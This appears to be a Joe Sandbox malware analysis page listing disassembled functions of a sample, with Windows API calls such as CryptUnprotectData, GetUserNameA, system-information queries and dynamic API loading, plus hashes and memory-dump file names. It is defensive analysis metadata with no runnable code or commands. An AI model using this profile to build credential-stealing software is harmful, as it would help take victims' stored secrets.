Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: d59316a50639213f8f546f4f3ff45a608908a1b7470f9bdffc9c2f3ec8db4ab0
Instruction ID: b5645760c68264e1900152c61d95bbdd51f3d2b660eaccbc5566d5dd205ba0bf
Opcode Fuzzy Hash: d59316a50639213f8f546f4f3ff45a608908a1b7470f9bdffc9c2f3ec8db4ab0
Instruction Fuzzy Hash: F2010CB5A00208ABCB14DFA5DD58BEEB7F9EB48300F144699A905A6240EB349F81DF51

Function 00487A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0110E020,00000000,?,00490E10,00000000,?,00000000,00000000), ref: 00487A63
RtlAllocateHeap.NTDLL(00000000), ref: 00487A6A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0110E020,00000000,?,00490E10,00000000,?,00000000,00000000,?), ref: 00487A7D
wsprintfA.USER32 ref: 00487AB7

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID:
API String ID: 3317088062-0
Opcode ID: c5d548b3ca59dee6ef332bd1ba82ba065e1ec2f1aafa041fe1a2b85f50878ce9
Instruction ID: 1ed44dfdbc00fe110136d4ac6257bcccb391fce8079596815fd1f1bed42ebf2b
Opcode Fuzzy Hash: c5d548b3ca59dee6ef332bd1ba82ba065e1ec2f1aafa041fe1a2b85f50878ce9
Instruction Fuzzy Hash: 6F1182B1D45218EBDB109B54DC45F69B778FB04711F10479AE51A932C0D7785A40CF55

Function 00479B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00479B84
LocalAlloc.KERNEL32(00000040,00000000), ref: 00479BA3
LocalFree.KERNEL32(?), ref: 00479BD3

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 073c67ed7ca6afe9d8b442584eb4532d579f89a59191caed77b2e4d21fc499e0
Instruction ID: fe0fdf77ed0c22c6e831f70cb7c25c960a6282a2aa3a68c4694b30a40ca132ca
Opcode Fuzzy Hash: 073c67ed7ca6afe9d8b442584eb4532d579f89a59191caed77b2e4d21fc499e0
Instruction Fuzzy Hash: 891109B8A00209EFDB04DF94D985AAEB7B5FF89300F104599E815A7350D774AE54CFA1

Function 00487850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004711B7), ref: 00487880
RtlAllocateHeap.NTDLL(00000000), ref: 00487887
GetUserNameA.ADVAPI32(00000104,00000104), ref: 0048789F

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID:
API String ID: 1296208442-0
Opcode ID: f5883007d09a8cfe8b3b1c7a53b851b7d3f667180ece71d9f8d60bffe1476838
Instruction ID: 8ba8c793ab7cf6ab3ee7c00d29def371284b3271a8e5ef7d4347b829d8c40e9a
Opcode Fuzzy Hash: f5883007d09a8cfe8b3b1c7a53b851b7d3f667180ece71d9f8d60bffe1476838
Instruction Fuzzy Hash: D4F04FF1D44208ABC700DFD8DD49FAEBBB8EB04711F10065AFA05A2680C77855448BA2

Function 00471160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 0047116A
ExitProcess.KERNEL32 ref: 0047117E

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 1bcb3eeecc75703b25311057ad42369840053a71a9c91bfdad1cfaf8942cfbdb
Instruction ID: ad3eddc768c8144dc9721f47ce6e612fc97f9ea57b03240fe03f72d4723a15a7
Opcode Fuzzy Hash: 1bcb3eeecc75703b25311057ad42369840053a71a9c91bfdad1cfaf8942cfbdb
Instruction Fuzzy Hash: B3D05EB890430CDBCB00DFE0D9496DDBB79FB0C321F0016A9D90562340EA3154C1CAA6

Function 00489C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,010F5910), ref: 00489C2D
GetProcAddress.KERNEL32(74DD0000,010F56B0), ref: 00489C45
GetProcAddress.KERNEL32(74DD0000,011096D0), ref: 00489C5E
GetProcAddress.KERNEL32(74DD0000,01109628), ref: 00489C76
GetProcAddress.KERNEL32(74DD0000,01109640), ref: 00489C8E
GetProcAddress.KERNEL32(74DD0000,01109658), ref: 00489CA7
GetProcAddress.KERNEL32(74DD0000,010FBBD0), ref: 00489CBF
GetProcAddress.KERNEL32(74DD0000,0110D3B0), ref: 00489CD7
GetProcAddress.KERNEL32(74DD0000,0110D380), ref: 00489CF0
GetProcAddress.KERNEL32(74DD0000,0110D200), ref: 00489D08
GetProcAddress.KERNEL32(74DD0000,0110D140), ref: 00489D20
GetProcAddress.KERNEL32(74DD0000,010F5770), ref: 00489D39
GetProcAddress.KERNEL32(74DD0000,010F5790), ref: 00489D51
GetProcAddress.KERNEL32(74DD0000,010F57B0), ref: 00489D69
GetProcAddress.KERNEL32(74DD0000,010F5930), ref: 00489D82
GetProcAddress.KERNEL32(74DD0000,0110D398), ref: 00489D9A
GetProcAddress.KERNEL32(74DD0000,0110D128), ref: 00489DB2
GetProcAddress.KERNEL32(74DD0000,010FBBF8), ref: 00489DCB
GetProcAddress.KERNEL32(74DD0000,010F5950), ref: 00489DE3
GetProcAddress.KERNEL32(74DD0000,0110D278), ref: 00489DFB
GetProcAddress.KERNEL32(74DD0000,0110D290), ref: 00489E14
GetProcAddress.KERNEL32(74DD0000,0110D338), ref: 00489E2C
GetProcAddress.KERNEL32(74DD0000,0110D3C8), ref: 00489E44
GetProcAddress.KERNEL32(74DD0000,010F5830), ref: 00489E5D
GetProcAddress.KERNEL32(74DD0000,0110D368), ref: 00489E75
GetProcAddress.KERNEL32(74DD0000,0110D218), ref: 00489E8D
GetProcAddress.KERNEL32(74DD0000,0110D158), ref: 00489EA6
GetProcAddress.KERNEL32(74DD0000,0110D230), ref: 00489EBE
GetProcAddress.KERNEL32(74DD0000,0110D0F8), ref: 00489ED6
GetProcAddress.KERNEL32(74DD0000,0110D170), ref: 00489EEF
GetProcAddress.KERNEL32(74DD0000,0110D3E0), ref: 00489F07
GetProcAddress.KERNEL32(74DD0000,0110D110), ref: 00489F1F
GetProcAddress.KERNEL32(74DD0000,0110D2F0), ref: 00489F38
GetProcAddress.KERNEL32(74DD0000,0110A6F0), ref: 00489F50
GetProcAddress.KERNEL32(74DD0000,0110D188), ref: 00489F68
GetProcAddress.KERNEL32(74DD0000,0110D2A8), ref: 00489F81
GetProcAddress.KERNEL32(74DD0000,010F5990), ref: 00489F99
GetProcAddress.KERNEL32(74DD0000,0110D1A0), ref: 00489FB1
GetProcAddress.KERNEL32(74DD0000,010F57D0), ref: 00489FCA
GetProcAddress.KERNEL32(74DD0000,0110D2C0), ref: 00489FE2
GetProcAddress.KERNEL32(74DD0000,0110D1B8), ref: 00489FFA
GetProcAddress.KERNEL32(74DD0000,010F5850), ref: 0048A013
GetProcAddress.KERNEL32(74DD0000,010F5B70), ref: 0048A02B
LoadLibraryA.KERNEL32(0110D1E8,?,00485CA3,00490AEB,?,?,?,?,?,?,?,?,?,?,00490AEA,00490AE3), ref: 0048A03D
LoadLibraryA.KERNEL32(0110D320,?,00485CA3,00490AEB,?,?,?,?,?,?,?,?,?,?,00490AEA,00490AE3), ref: 0048A04E
LoadLibraryA.KERNEL32(0110D1D0,?,00485CA3,00490AEB,?,?,?,?,?,?,?,?,?,?,00490AEA,00490AE3), ref: 0048A060
LoadLibraryA.KERNEL32(0110D248,?,00485CA3,00490AEB,?,?,?,?,?,?,?,?,?,?,00490AEA,00490AE3), ref: 0048A072
LoadLibraryA.KERNEL32(0110D260,?,00485CA3,00490AEB,?,?,?,?,?,?,?,?,?,?,00490AEA,00490AE3), ref: 0048A083
LoadLibraryA.KERNEL32(0110D2D8,?,00485CA3,00490AEB,?,?,?,?,?,?,?,?,?,?,00490AEA,00490AE3), ref: 0048A095
LoadLibraryA.KERNEL32(0110D308,?,00485CA3,00490AEB,?,?,?,?,?,?,?,?,?,?,00490AEA,00490AE3), ref: 0048A0A7
LoadLibraryA.KERNEL32(0110D350,?,00485CA3,00490AEB,?,?,?,?,?,?,?,?,?,?,00490AEA,00490AE3), ref: 0048A0B8
GetProcAddress.KERNEL32(75290000,010F5B50), ref: 0048A0DA
GetProcAddress.KERNEL32(75290000,0110D428), ref: 0048A0F2
GetProcAddress.KERNEL32(75290000,01108FD8), ref: 0048A10A
GetProcAddress.KERNEL32(75290000,0110D4E8), ref: 0048A123
GetProcAddress.KERNEL32(75290000,010F5DD0), ref: 0048A13B
GetProcAddress.KERNEL32(73B40000,010FB838), ref: 0048A160
GetProcAddress.KERNEL32(73B40000,010F5B90), ref: 0048A179
GetProcAddress.KERNEL32(73B40000,010FB5E0), ref: 0048A191
GetProcAddress.KERNEL32(73B40000,0110D548), ref: 0048A1A9
GetProcAddress.KERNEL32(73B40000,0110D500), ref: 0048A1C2
GetProcAddress.KERNEL32(73B40000,010F5C10), ref: 0048A1DA
GetProcAddress.KERNEL32(73B40000,010F5C70), ref: 0048A1F2
GetProcAddress.KERNEL32(73B40000,0110D5A8), ref: 0048A20B
GetProcAddress.KERNEL32(752C0000,010F5CD0), ref: 0048A22C
GetProcAddress.KERNEL32(752C0000,010F5BF0), ref: 0048A244
GetProcAddress.KERNEL32(752C0000,0110D518), ref: 0048A25D
GetProcAddress.KERNEL32(752C0000,0110D4D0), ref: 0048A275
GetProcAddress.KERNEL32(752C0000,010F5C30), ref: 0048A28D
GetProcAddress.KERNEL32(74EC0000,010FB770), ref: 0048A2B3
GetProcAddress.KERNEL32(74EC0000,010FB748), ref: 0048A2CB
GetProcAddress.KERNEL32(74EC0000,0110D440), ref: 0048A2E3
GetProcAddress.KERNEL32(74EC0000,010F5DB0), ref: 0048A2FC
GetProcAddress.KERNEL32(74EC0000,010F5E50), ref: 0048A314
GetProcAddress.KERNEL32(74EC0000,010FB8B0), ref: 0048A32C
GetProcAddress.KERNEL32(75BD0000,0110D530), ref: 0048A352
GetProcAddress.KERNEL32(75BD0000,010F5B30), ref: 0048A36A
GetProcAddress.KERNEL32(75BD0000,01108FF8), ref: 0048A382
GetProcAddress.KERNEL32(75BD0000,0110D578), ref: 0048A39B
GetProcAddress.KERNEL32(75BD0000,0110D560), ref: 0048A3B3
GetProcAddress.KERNEL32(75BD0000,010F5C50), ref: 0048A3CB
GetProcAddress.KERNEL32(75BD0000,010F5C90), ref: 0048A3E4
GetProcAddress.KERNEL32(75BD0000,0110D410), ref: 0048A3FC
GetProcAddress.KERNEL32(75BD0000,0110D458), ref: 0048A414
GetProcAddress.KERNEL32(75A70000,010F5B10), ref: 0048A436
GetProcAddress.KERNEL32(75A70000,0110D590), ref: 0048A44E
GetProcAddress.KERNEL32(75A70000,0110D3F8), ref: 0048A466
GetProcAddress.KERNEL32(75A70000,0110D470), ref: 0048A47F
GetProcAddress.KERNEL32(75A70000,0110D488), ref: 0048A497
GetProcAddress.KERNEL32(75450000,010F5CB0), ref: 0048A4B8
GetProcAddress.KERNEL32(75450000,010F5D30), ref: 0048A4D1
GetProcAddress.KERNEL32(75DA0000,010F5DF0), ref: 0048A4F2
GetProcAddress.KERNEL32(75DA0000,0110D4A0), ref: 0048A50A
GetProcAddress.KERNEL32(6F280000,010F5E10), ref: 0048A530
GetProcAddress.KERNEL32(6F280000,010F5BB0), ref: 0048A548
GetProcAddress.KERNEL32(6F280000,010F5AD0), ref: 0048A560
GetProcAddress.KERNEL32(6F280000,0110D4B8), ref: 0048A579
GetProcAddress.KERNEL32(6F280000,010F5E30), ref: 0048A591
GetProcAddress.KERNEL32(6F280000,010F5CF0), ref: 0048A5A9
GetProcAddress.KERNEL32(6F280000,010F5AB0), ref: 0048A5C2
GetProcAddress.KERNEL32(6F280000,010F5D10), ref: 0048A5DA
GetProcAddress.KERNEL32(6F280000,InternetSetOptionA), ref: 0048A5F1
GetProcAddress.KERNEL32(6F280000,HttpQueryInfoA), ref: 0048A607
GetProcAddress.KERNEL32(75AF0000,0110D0E0), ref: 0048A629
GetProcAddress.KERNEL32(75AF0000,01108FE8), ref: 0048A641
GetProcAddress.KERNEL32(75AF0000,0110CFC0), ref: 0048A659
GetProcAddress.KERNEL32(75AF0000,0110CF90), ref: 0048A672
GetProcAddress.KERNEL32(75D90000,010F5D50), ref: 0048A693
GetProcAddress.KERNEL32(6E200000,0110D050), ref: 0048A6B4
GetProcAddress.KERNEL32(6E200000,010F5AF0), ref: 0048A6CD
GetProcAddress.KERNEL32(6E200000,0110CE88), ref: 0048A6E5
GetProcAddress.KERNEL32(6E200000,0110CF60), ref: 0048A6FD

Strings

HttpQueryInfoA, xrefs: 0048A5FC
InternetSetOptionA, xrefs: 0048A5E5

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 2238633743-1775429166
Opcode ID: f928891eca37b3c6eba67e7bc3214ffe641fc22927121889b170b26223d3e169
Instruction ID: c41d8b9c2eadc7a7bea7a4c45ce2d121fe360af5d7244156eebf2171d80eb049
Opcode Fuzzy Hash: f928891eca37b3c6eba67e7bc3214ffe641fc22927121889b170b26223d3e169
Instruction Fuzzy Hash: E0622FF9518200AFC354DFE8ED9899637FBF74C301714A72AE609C3664DA3A94C1DB52

Function 00477710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00477724
RtlAllocateHeap.NTDLL(00000000), ref: 0047772B
lstrcat.KERNEL32(?,01109C80), ref: 004778DB
lstrcat.KERNEL32(?,?), ref: 004778EF
